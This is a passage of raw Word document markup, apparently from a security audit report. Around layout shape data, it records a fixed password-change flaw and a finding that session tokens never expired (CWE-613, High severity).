                <v:shape id="Shape 1314" o:spid="_x0000_s1027" style="position:absolute;width:12858;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="12858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7axQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFLzVrA9suzWKCOKLHrQVr9PNdB/dTJZNdFd/vREKvc3H95zxtDWlOFPtcssKet0IBHFi&#10;dc6pgq/PxfMrCOeRNZaWScGFHEwnjw9jjLVteEfnvU9FCGEXo4LM+yqW0iUZGXRdWxEH7sfWBn2A&#10;dSp1jU0IN6XsR9FIGsw5NGRY0Tyj5Hd/Mgq+r/Nmi8tNsT6+pbtDvyxeZh+FUp2ndvYOwlPr/8V/&#10;7pUO8we9Idy/CSfIyQ0AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBeNi7axQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l1276350,v2630,,4875,930,6735,2778c1284945,4638,1285875,6890,1285875,9525r,114300c1285875,126454,1284945,128699,1283085,130559v-1860,1848,-4105,2779,-6735,2791l9525,133350v-2630,-12,-4875,-943,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1285875,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fixed:</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POST /change-password</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> requiring the current password so a stolen </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot be used to change the password and lock the real owner out and revoking every session afterwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02972121" w14:textId="4707943C" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="386" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADEB2CC" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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V-06 · Tokens never expired and survived termination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E24B6" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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A07:2021 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-613</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CWE-672</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High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E533A8D"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8400" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B542B73" wp14:editId="7713A8C6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>608707</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-15211</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26567" name="Group 26567"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048000" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3048000" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1330" name="Shape 1330"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1276350" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269455" y="0"/>
                                  <a:pt x="1271700" y="930"/>
                                  <a:pt x="1273560" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275420" y="4651"/>
                                  <a:pt x="1276350" y="6890"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="126448"/>
                                  <a:pt x="1275420" y="128687"/>
                                  <a:pt x="1273560" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="132407"/>
                                  <a:pt x="1269455" y="133338"/>
                                  <a:pt x="126682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333" name="Shape 1333"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1304925" y="0"/>
                            <a:ext cx="1219200" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1219200" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1209675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1212305" y="0"/>
                                  <a:pt x="1214550" y="930"/>
                                  <a:pt x="1216410" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1218270" y="4651"/>
                                  <a:pt x="1219200" y="6890"/>
                                  <a:pt x="1219200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1219200" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1219200" y="126448"/>
                                  <a:pt x="1218270" y="128687"/>
                                  <a:pt x="1216410" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1214550" y="132407"/>
                                  <a:pt x="1212305" y="133338"/>
                                  <a:pt x="120967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340" name="Shape 1340"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="952500" y="171450"/>
                            <a:ext cx="1219200" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1219200" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1209675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1212306" y="0"/>
                                  <a:pt x="1214550" y="930"/>
                                  <a:pt x="1216410" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1218270" y="4638"/>
                                  <a:pt x="1219200" y="6890"/>
                                  <a:pt x="1219200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1219200" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1219200" y="126454"/>
                                  <a:pt x="1218270" y="128699"/>
                                  <a:pt x="1216410" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1214550" y="132420"/>
                                  <a:pt x="1212306" y="133350"/>
                                  <a:pt x="1209675"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343" name="Shape 1343"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2466975" y="171450"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6890"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126454"/>
                                  <a:pt x="580095" y="128699"/>
                                  <a:pt x="578235" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="132420"/>
                                  <a:pt x="574130" y="133350"/>
                                  <a:pt x="571500"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DBA5BA2" id="Group 26567" o:spid="_x0000_s1026" style="position:absolute;margin-left:47.95pt;margin-top:-1.2pt;width:240pt;height:24pt;z-index:-251438080" coordsize="30480,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&#10;">
                <v:shape id="Shape 1330" o:spid="_x0000_s1027" style="position:absolute;width:12763;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1276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kWgxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BSwNB&#10;DIXvQv/DEMFLsbNaEdl2WlSwiAer1Yu3dCfuLt3JLDtxO/335iB4S3gv731ZrnPozEhDaiM7uJoV&#10;YIir6FuuHXx+PF3egUmC7LGLTA5OlGC9mpwtsfTxyO807qQ2GsKpRAeNSF9am6qGAqZZ7IlV+45D&#10;QNF1qK0f8KjhobPXRXFrA7asDQ329NhQddj9BAebh3GbX76yvN5UPJ3Kfty8naxzF+f5fgFGKMu/&#10;+e/62Sv+fK78+o2OYFe/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIMKRaDHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l1266825,v2630,,4875,930,6735,2791c1275420,4651,1276350,6890,1276350,9525r,114300c1276350,126448,1275420,128687,1273560,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1276350,133350"/>
                </v:shape>
                <v:shape id="Shape 1333" o:spid="_x0000_s1028" style="position:absolute;left:13049;width:12192;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219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izExAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN500wZtidmIFMSW4kFtob0N2TFJzc6G3a2m/94VBG/zeJ+TL3rTihM531hW8DhJQBCX&#10;VjdcKfjcr8YvIHxA1thaJgX/5GFRDAc5ZtqeeUunXahEDGGfoYI6hC6T0pc1GfQT2xFH7mCdwRCh&#10;q6R2eI7hppVPSTKTBhuODTV29FpTedz9GQX7ab/pvrb2Zz39fTf+u3Upfjwr9TDql3MQgfpwF9/c&#10;bzrOT9MUrt/EE2RxAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFUGLMTEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l1209675,v2630,,4875,930,6735,2791c1218270,4651,1219200,6890,1219200,9525r,114300c1219200,126448,1218270,128687,1216410,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1219200,133350"/>
                </v:shape>
                <v:shape id="Shape 1340" o:spid="_x0000_s1029" style="position:absolute;left:9525;top:1714;width:12192;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219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sHOyAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9La8Mw&#10;EITvhfwHsYHeGrlJ88CNEkKhtCX0kBekt8Xa2k6slZHUxP333UOgt11mdubb+bJzjbpQiLVnA4+D&#10;DBRx4W3NpYH97vVhBiomZIuNZzLwSxGWi97dHHPrr7yhyzaVSkI45migSqnNtY5FRQ7jwLfEon37&#10;4DDJGkptA14l3DV6mGUT7bBmaaiwpZeKivP2xxnYjbvP9rDxX2/j04eLxyaMcD015r7frZ5BJerS&#10;v/l2/W4Ff/Qk/PKNjKAXfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD90sHOyAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" path="m9525,l1209675,v2631,,4875,930,6735,2778c1218270,4638,1219200,6890,1219200,9525r,114300c1219200,126454,1218270,128699,1216410,130559v-1860,1861,-4104,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1219200,133350"/>
                </v:shape>
                <v:shape id="Shape 1343" o:spid="_x0000_s1030" style="position:absolute;left:24669;top:1714;width:5811;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5810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rawgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFLzVxAdLuzVKKQjSm1qQ3obNdHfbzWRJ4hr7640geJuP7zmLVbKdGMiH1rGGyViBIK6c&#10;abnW8LVfP7+ACBHZYOeYNJwpwGr5+LDA0rgTb2nYxVrkEA4lamhi7EspQ9WQxTB2PXHmfpy3GDP0&#10;tTQeTzncdnKqVCEttpwbGuzpo6Hqb3e0Gl79Qc2Lifr85v+h6H4pHVxMWo+e0vsbiEgp3sU398bk&#10;+bP5DK7f5BPk8gIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAZu3rawgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l571500,v2630,,4875,930,6735,2778c580095,4638,581025,6890,581025,9525r,114300c581025,126454,580095,128699,578235,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,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79424" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="483EB781" wp14:editId="2912A835">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4618732</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-15211</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="342900" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26568" name="Group 26568"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="342900" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="342900" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1336" name="Shape 1336"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="342900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338251" y="930"/>
                                  <a:pt x="340110" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4651"/>
                                  <a:pt x="342900" y="6890"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="126448"/>
                                  <a:pt x="341970" y="128687"/>
                                  <a:pt x="340110" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338251" y="132407"/>
                                  <a:pt x="336005" y="133338"/>
                                  <a:pt x="33337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E84FB87" id="Group 26568" o:spid="_x0000_s1026" style="position:absolute;margin-left:363.7pt;margin-top:-1.2pt;width:27pt;height:10.5pt;z-index:-251437056" coordsize="3429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63GTgMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N9q8CrEDtFkuRRs0&#10;6QcwFGUJoESBpC27X9/hSKQsKwjaJAeH4ix8781wub45Vtw7MKlKUW/86Cr0PVZTkZX1buP/fr7/&#10;svI9pUmdES5qtvFPTPk328+frtsmZbEoBM+Y9CBJrdK22fiF1k0aBIoWrCLqSjSsBmMuZEU0fMpd&#10;kEnSQvaKB3EYLoJWyKyRgjKlYPa2M/pbzJ/njOqfea6Y9vjGB2wafyX+vpjfYHtN0p0kTVHSHgZ5&#10;B4qKlDUs6lLdEk28vSwnqaqSSqFErq+oqAKR5yVlyAHYROEFmwcp9g1y2aXtrnEygbQXOr07Lf1x&#10;eJDNU/MoQYm22YEW+GW4HHNZmf+A0juiZCcnGTtqj8JkMovXIQhLwRQlSTLvJaUF6D6JosXdm3GB&#10;XTQYQWkbaA418Fcf4/9UkIahrCoF/o/SKzNEv/C9mlTQpejhAZ+FaRCzPPg5kVSqQK+PKeSYkpTu&#10;lX5gAqUmh+9Kdz2Z2REp7IgeazuU0Nlv9nRDtIkzKM3Qa4daFa5UxlqJA3sW6KdNwdbzeO57ttKA&#10;c3Dg9bkjVDtZjl2tA92/lPQr+zN2X4ThmTvgwvWSZBXPI1xxnfTd01tmYRRBbwGWeLmOTCkAzjj3&#10;+MvGRetlFzdbQGrU05q6doWUi9X6YjVnQgleW83ymySLYsOiR2i9XsfmVonixWy2GqNzwKN4tVgt&#10;x0anRpSE8xka/02PQeEoiWfhOG3iymL2bzIGNJR42NyTNS3fThXXP6MI6/OaJlCJri+mAKB+XSGn&#10;wKElrOm/1DBNZlpqqrCdvyyLnT8r8ZiGJdcJ0Lmf9ZA1j4POnS970WK8bF/H+b/2gxPxYn853Uf7&#10;wNUPZyfFplwo1u0Nc67glnRnDXoPpxmvzbEDelACV3vOicY7sio13Pm8rEwRliFcH10+XkM2c9h2&#10;xyuO9Ikzczbx+hfL4ZzGe8hMKLl7+caldyDmZsc/TE54U5B+ts/buyJUzGPi85JzlzLC0FHKu9v7&#10;+B6PfyDVO5s4ho8KFxl2kbRH070s4H4G0vZ9AfEuCFcWtXbxNbyKEOYZWzN8EdkJ72QUBC4/lAaf&#10;Acijf7KYd8b5N3oND6vtXwAAAP//AwBQSwMEFAAGAAgAAAAhAH5029vfAAAACQEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG5b2gJrVZpO0wScJiQ2JMTNa7y2WpNUTdZ2b485wcm2&#10;/On352I9m06MNPjWWQXxMgJBtnK6tbWCz8PrIgPhA1qNnbOk4Eoe1uXtTYG5dpP9oHEfasEh1ueo&#10;oAmhz6X0VUMG/dL1ZHl3coPBwONQSz3gxOGmk0kUraTB1vKFBnvaNlSd9xej4G3CafMQv4y782l7&#10;/T48vX/tYlLq/m7ePIMINIc/GH71WR1Kdjq6i9VedArSJH1kVMEi4cpAmsXcHJnMViDLQv7/